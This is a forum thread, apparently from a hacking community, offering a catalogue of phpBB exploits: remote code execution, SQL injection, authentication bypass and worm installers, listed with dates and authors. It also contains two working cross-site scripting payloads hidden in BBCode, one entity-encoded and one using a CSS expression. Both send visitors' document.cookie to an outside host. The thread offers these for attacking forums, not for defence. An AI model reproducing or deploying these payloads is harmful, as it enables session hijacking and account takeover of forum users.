Since, besides IPB, there are also a lot of questions about phpBB forums, I decided, with the moderators' permission, to create this thread, which people can be pointed to instead of being sent to the search. Here I will post all sorts of exploits and so on =) Exploits for all versions will be posted.
It seems there is already an almost identical thread, and also by you =))) http://forum.antichat.ru/thread10398-phpbb.html
phpBB 2.0.13 (admin_styles.php) Remote Command Execution Exploit
phpBB 2.0.15 Remote PHP Code Execution Exploit (metasploit)
phpBB <= 2.0.16 XSS Remote Cookie Disclosure Exploit (cookie grabber)
phpBB <= 2.0.16 XSS Remote Cookie Disclosure Exploit
phpBB 2.0.15 (highlight) Database Authentication Details Exploit
phpBB 2.0.15 (highlight) Remote PHP Code Execution
phpBB <= 2.0.15 Register Multiple Users Denial of Service (perl code)
phpBB <= 2.0.15 Register Multiple Users Denial of Service (c code)
phpBB <= 2.0.13 'Calendar Pro' mod Remote Exploit
phpBB <= 2.0.13 'downloads.php' mod Remote Exploit
phpBB <= 2.0.12 Change User Rights Authentication Bypass (c code)
phpBB <= 2.0.12 Change User Rights Authentication Bypass
phpBB <= 2.0.12 Session Handling Authentication Bypass (tutorial 2)
phpBB <= 2.0.12 Session Handling Authentication Bypass (tutorial)
phpBB <= 2.0.10 Bot Install (Altavista) (ssh.D.Worm)
Sanity.b - phpBB <= 2.0.10 Bot Install (AOL/Yahoo Search)
phpBB highlight Arbitrary File Upload (Santy.A)
PHP <= 4.3.9 & phpBB 2.x with unserialize() Remote Exploit (compiled)
phpBB v1.0.0 - 2.0.10 admin_cash.php remote exploit
phpBB <= 2.0.10 Remote Command Execution Exploit (cgi version)
phpBB <= 2.0.10 Remote Command Execution Exploit
phpBB 2.0.6 search_id sql injection MD5 Hash Remote Exploit
phpBB 2.0.4 Remote php File Include Exploit
phpBB 2.0.5 SQL Injection password disclosure Exploit
phpBB 2.0.18 HTML: [url]http://www.[url=http://wj.com/style=display:none;background&+#58;&+#117;&+#114;&+#108;&+#40;&+#106;&+#97;&+#118;&+#97;&+#115;&+#99;&+#114;&+#105;&+#112;&+#116;&+#58;&+#100;&+#111;&+#99;&+#117;&+#109;&+#101;&+#110;&+#116;&+#46;&+#105;&+#109;&+#97;&+#103;&+#101;&+#115;&+#91;&+#49;&+#93;&+#46;&+#115;&+#114;&+#99;&+#61;&+#34;&+#104;&+#116;&+#116;&+#112;&+#58;&+#47;&+#47;&+#97;&+#110;&+#116;&+#105;&+#99;&+#104;&+#97;&+#116;&+#46;&+#114;&+#117;&+#47;&+#99;&+#103;&+#105;&+#45;&+#98;&+#105;&+#110;&+#47;&+#115;&+#46;&+#106;&+#112;&+#103;&+#63;&+#34;+document.cookie;&+#41;&+#32;]wj[/url][/url]
2005-10-11 phpBB 2.0.13 (admin_styles.php) Remote Command Execution Exploit 6680 R D RusH
2005-07-19 phpBB 2.0.15 Remote PHP Code Execution Exploit (metasploit) 10311 R M D str0ke
2005-07-13 phpBB <= 2.0.16 XSS Remote Cookie Disclosure Exploit (cookie grabber) 5813 R D suBzero
2005-07-08 phpBB <= 2.0.16 XSS Remote Cookie Disclosure Exploit 10273 R D D|ablo
2005-07-03 phpBB 2.0.15 (highlight) Database Authentication Details Exploit 11755 R M D SecureD
2005-06-29 phpBB 2.0.15 (highlight) Remote PHP Code Execution 7951 R M D rattle
2005-06-22 phpBB <= 2.0.15 Register Multiple Users Denial of Service (perl code) 4187 R D g30rg3_x
2005-06-22 phpBB <= 2.0.15 Register Multiple Users Denial of Service (c code) 2684 R D HaCkZaTaN
2005-04-04 phpBB <= 2.0.13 'Calendar Pro' mod Remote Exploit 3803 R D CereBrums
2005-04-02 phpBB <= 2.0.13 'downloads.php' mod Remote Exploit 6635 R D CereBrums
2005-03-24 phpBB <= 2.0.12 Change User Rights Authentication Bypass (c code) 4670 R D str0ke
2005-03-21 phpBB <= 2.0.12 Change User Rights Authentication Bypass 7392 R D Kutas
2005-03-11 phpBB <= 2.0.12 Session Handling Authentication Bypass (tutorial 2) 8675 R D Ali7
2005-03-05 phpBB <= 2.0.12 Session Handling Authentication Bypass (tutorial) 4825 R D PPC
2005-01-04 phpBB <= 2.0.10 Bot Install (Altavista) (ssh.D.Worm) 2436 R D Severino Honorato
2004-12-25 Sanity.b - phpBB <= 2.0.10 Bot Install (AOL/Yahoo Search) 1717 R D n/a
2004-12-22 phpBB highlight Arbitrary File Upload (Santy.A) 1956 R D n/a
2004-12-17 PHP <= 4.3.9 & phpBB 2.x with unserialize() Remote Exploit (compiled) 2184 R D overdose
2004-12-05 phpBB v1.0.0 - 2.0.10 admin_cash.php remote exploit 2279 R D evilrabbi
2004-12-03 phpBB <= 2.0.10 Remote Command Execution Exploit (cgi version) 2372 R M D ZzagorR
2004-11-22 phpBB <= 2.0.10 Remote Command Execution Exploit 4447 R M D RusH
2003-12-21 phpBB 2.0.6 search_id sql injection MD5 Hash Remote Exploit 2482 R D RusH
2003-06-30 phpBB 2.0.4 Remote php File Include Exploit 1735 R D Spoofed
2003-06-20 phpBB 2.0.5 SQL Injection password disclosure Exploit 2316 R D Rick Patel
HTML: [color=#EFEFEF][url]www.ut[url=www.s=''style='font-size:0;color:#EFEFEF'style='top:expression(eval(this.sss));'sss=`i=new/**/Image();i.src='http://antichat.ru/cgi-bin/s.jpg?'+document.cookie;this.sss=null`style='font-size:0;][/url][/url]'[/color]
To help you all =))
Everyone who wants to help build this thread: send bugs by PM; this thread goes in the bin. Bug-list threads like this one will be created soon.